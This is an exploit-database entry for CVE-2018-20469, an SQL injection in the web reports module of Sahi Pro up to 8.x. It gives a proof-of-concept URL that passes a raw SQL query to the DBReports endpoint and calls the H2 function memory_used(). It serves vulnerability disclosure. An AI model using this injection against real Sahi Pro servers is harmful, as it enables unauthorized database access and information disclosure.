# CVE-2018-20469 Sahi pro 8.x SQL注入漏洞
# Exploit Title: Sahi pro ( <= 8.x ) sensitive information disclosure by SQL injection. # Date: 17-06-2019 # Exploit Author: Goutham Madhwaraj ( https://barriersec.com ) # Vendor Homepage: https://sahipro.com/ # Software Link: https://sahipro.com/downloads-archive/ # Version: 7.x , <= 8.x # Tested on: Windows 10 # CVE : CVE-2018-20469 # POC-URL : https://barriersec.com/2019/06/cve-2018-20469-sahi-pro/ Description : An issue was discovered in Tyto Sahi Pro through 7.x.x and 8.0.0. A parameter in the web reports module is vulnerable to SQL injection. This can be exploited to inject SQL queries and run standard h2 system functions. POC : vulnerable URL : ''' replace the ip and port of the remote sahi pro server machine ''' # here sql query is passed directly as part of GET request which can be modified to run standard h2 database functions. in the following POC , "memory_used()" function is injected , which is reflected in "status" column of reports page. http://: /_s_/dyn/pro/DBReports?sql=SELECT DISTINCT memory_used() AS ROWSTATUS, SCRIPTREPORTS.SCRIPTREPORTID,SCRIPTREPORTS.SCRIPTNAME,SUITEREPORTS.* FROM SUITEREPORTS,SCRIPTREPORTS
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